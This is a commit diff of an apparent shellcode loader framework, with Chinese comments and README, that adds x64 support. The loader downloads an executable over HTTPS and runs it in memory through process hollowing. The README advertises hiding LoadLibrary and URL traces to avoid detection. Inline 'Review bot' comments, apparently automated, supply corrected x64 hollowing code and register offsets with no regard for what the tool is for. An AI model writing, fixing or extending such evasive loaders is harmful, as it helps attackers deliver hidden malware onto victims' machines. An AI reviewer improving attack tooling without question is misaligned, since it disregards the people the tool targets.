添加x64支持
This commit is contained in:
parent
f2a79f5e05
commit
12a917c5db
Binary file not shown.
|
@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
|
|||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
|
||||
#endif
|
||||
|
||||
|
||||
|
|
|
@ -159,6 +159,11 @@
|
|||
<AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="api.h" />
|
||||
<ClInclude Include="hash.h" />
|
||||
|
|
|
@ -1,10 +1,15 @@
|
|||
#include "ShellCode.h"
|
||||
|
||||
//加载起始函数,跳转到入口函数
|
||||
#ifdef _WIN64
|
||||
VOID mmLoaderSCStart(){
|
||||
Strat();
|
||||
#else
|
||||
VOID _declspec(naked) mmLoaderSCStart()
|
||||
{
|
||||
|
||||
__asm jmp Strat;
|
||||
#endif
|
||||
}
|
||||
|
||||
|
||||
|
@ -49,7 +54,7 @@ public:
|
|||
|
||||
|
||||
//提取项目的main文件,StartSCode相当于项目的main函数
|
||||
void __stdcall StartSCode(char * URL)
|
||||
void __stdcall StartSCode()
|
||||
{
|
||||
|
||||
|
||||
|
@ -62,7 +67,7 @@ public:
|
|||
|
||||
int size = HttpDownload(host, path, 443, TRUE);
|
||||
|
||||
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||
|
||||
RunPortableExecutable();
|
||||
|
||||
|
@ -75,15 +80,21 @@ public:
|
|||
};
|
||||
|
||||
//sehllcode入口函数
|
||||
void __stdcall Strat(char * URL)
|
||||
void __stdcall Strat()
|
||||
{
|
||||
//由于需要模拟全局变量,所以使用类包裹下
|
||||
RmExecute runclass;
|
||||
|
||||
runclass.StartSCode(URL);
|
||||
runclass.StartSCode();
|
||||
}
|
||||
#ifdef _WIN64
|
||||
void mmLoaderSCEnd()
|
||||
{
|
||||
|
||||
#else
|
||||
void __declspec(naked) mmLoaderSCEnd()
|
||||
{
|
||||
|
||||
__asm int 3;
|
||||
#endif
|
||||
}
|
|
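Review bot: The x64 branches of mmLoaderSCStart and mmLoaderSCEnd are ordinary C functions with no naked/inline-asm equivalent, so the shellcode blob that is presumably cut between those two symbols now depends on the compiler and linker keeping both markers, Strat and everything it calls contiguous and in source order, and nothing in the hunk pins that down. The 64-bit mmLoaderSCEnd has an empty body, which /OPT:ICF may fold with any other empty function, and /O2 can inline `Strat()` into the start stub or place it after the end marker; I would record the required build settings next to the macro, e.g. `// x64: no naked functions here, so the [mmLoaderSCStart, mmLoaderSCEnd) range only stays contiguous with /OPT:NOICF, no LTCG and a fixed function order` above the `#ifdef _WIN64`. The existing top comment only says "jump to the entry function"; `// First bytes of the blob: transfer control to Strat(), the real entry` would tell a reader why Start and Strat are separate. The StartSCode body continues outside the hunk.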
@ -9,7 +9,7 @@
|
|||
EXTERN_C VOID
|
||||
mmLoaderSCStart();//这里用来表明shellcode的开始
|
||||
|
||||
void __stdcall Strat(char * URL);//入口函数main
|
||||
void __stdcall Strat();//入口函数main
|
||||
|
||||
EXTERN_C VOID
|
||||
mmLoaderSCEnd();//与开头对应的结尾
|
|
@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
|
|||
return dwLast;
|
||||
}
|
||||
|
||||
#ifdef _WIN64
|
||||
bool RmExecute::RunPortableExecutable() {
|
||||
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
|
||||
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
|
||||
IMAGE_SECTION_HEADER* SectionHeader;
|
||||
|
||||
PROCESS_INFORMATION PI;
|
||||
STARTUPINFOA SI;
|
||||
|
||||
CONTEXT* CTX;
|
||||
|
||||
ULONG_PTR* ImageBase; //Base address of the image
|
||||
void* pImageBase; // Pointer to the image base
|
||||
|
||||
int count;
|
||||
char CurrentFilePath[1024];
|
||||
|
||||
DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
|
||||
NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
|
||||
|
||||
GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
|
||||
|
||||
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
|
||||
{
|
||||
ZeroMemory(&PI, sizeof(PI)); // Null the memory
|
||||
ZeroMemory(&SI, sizeof(SI)); // Null the memory
|
||||
|
||||
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
|
||||
CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
|
||||
//process in suspended state, for the new image.
|
||||
{
|
||||
// Allocate memory for the context.
|
||||
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
|
||||
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
|
||||
|
||||
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
|
||||
{
|
||||
// Read instructions
|
||||
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
|
||||
|
||||
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
|
||||
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// Write the image to the process
|
||||
WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
|
||||
|
||||
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
|
||||
{
|
||||
SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
|
||||
|
||||
WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
|
||||
LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
|
||||
}
|
||||
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
|
||||
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
|
||||
|
||||
// Move address of entry point to the rax register
|
||||
CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
|
||||
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
|
||||
ResumeThread(PI.hThread);
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
#else
|
||||
bool RmExecute::RunPortableExecutable()
|
||||
{
|
||||
|
||||
|
@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
|
|||
}
|
||||
return false;
|
||||
}
|
||||
#endif
|
|
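Review bot: The new x64 RunPortableExecutable keeps the 32-bit layout constants, so it corrupts the image it maps: the section table is computed as `e_lfanew + 248` (sizeof(IMAGE_NT_HEADERS32)) although a 64-bit NT header is 264 bytes, and the remote image-base pointer is read and written with length 4 even though `ImageBase` and `OptionalHeader.ImageBase` are 8 bytes in this build, so the low half is the only part touched. The context handling is also carried over unchanged from x86 (`CTX->Rbx + 8`, entry point in `Rax`); as far as I know the initial x64 thread context carries the PEB in Rdx, with ImageBaseAddress at +0x10, and the start address in Rcx, so please confirm this under a debugger before relying on it. Smaller but real: `VirtualAlloc(NULL, sizeof(CTX), ...)` asks for the size of a pointer rather than a CONTEXT (it only works because the allocation is page-rounded), none of the allocate/write calls are checked, and the function returns 0 on the success path and falls off the end without a return value on every other path, which is undefined behaviour for a `bool` function. Because `newbuff` comes off the network, `e_lfanew`, `SizeOfHeaders` and each section's `PointerToRawData + SizeOfRawData` should be bounded against the downloaded size before being dereferenced or copied.
```cpp
// … unchanged: DOS/NT header setup, CreateProcessA(CREATE_SUSPENDED) …
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CONTEXT), MEM_COMMIT, PAGE_READWRITE));
if (!CTX) return false;
CTX->ContextFlags = CONTEXT_FULL;
// … unchanged: GetThreadContext …
// x64 initial context: Rdx = PEB, PEB->ImageBaseAddress lives at +0x10 (verify under a debugger)
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rdx + 0x10), &ImageBase, sizeof(ImageBase), 0);
// … unchanged: VirtualAllocEx + header WriteProcessMemory …
SectionHeader = IMAGE_FIRST_SECTION(NtHeader) + count;   // 264-byte NT header on x64, not the 248 of x86
// … unchanged: per-section WriteProcessMemory …
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rdx + 0x10),
                   &NtHeader->OptionalHeader.ImageBase, sizeof(NtHeader->OptionalHeader.ImageBase), 0);
CTX->Rcx = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;  // entry point goes in Rcx on x64
// … unchanged: SetThreadContext / ResumeThread …
return true;
```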
@ -2,7 +2,7 @@
|
|||
|
||||
Remote Download and Memory Execute for shellcode framework
|
||||
|
||||
远程下载并内存加载的ShellCode框架,暂不支持X64
|
||||
远程下载并内存加载的ShellCode框架,已经支持x64
|
||||
|
||||
# 参(抄)考(袭)项目
|
||||
|
||||
|
@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
|
|||
|
||||
隐藏loadlibrary特征和url特征,更不容易被发现
|
||||
|
||||
## X64支持
|
||||
|
||||
自行调试`Tool.h->RunPortableExecutable`函数,大概就是加个X64宏把EAX什么换成RAX(应该
|
||||
|
||||
## 反射DLL加载技术
|
||||
|
||||
完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化
|
||||
|
|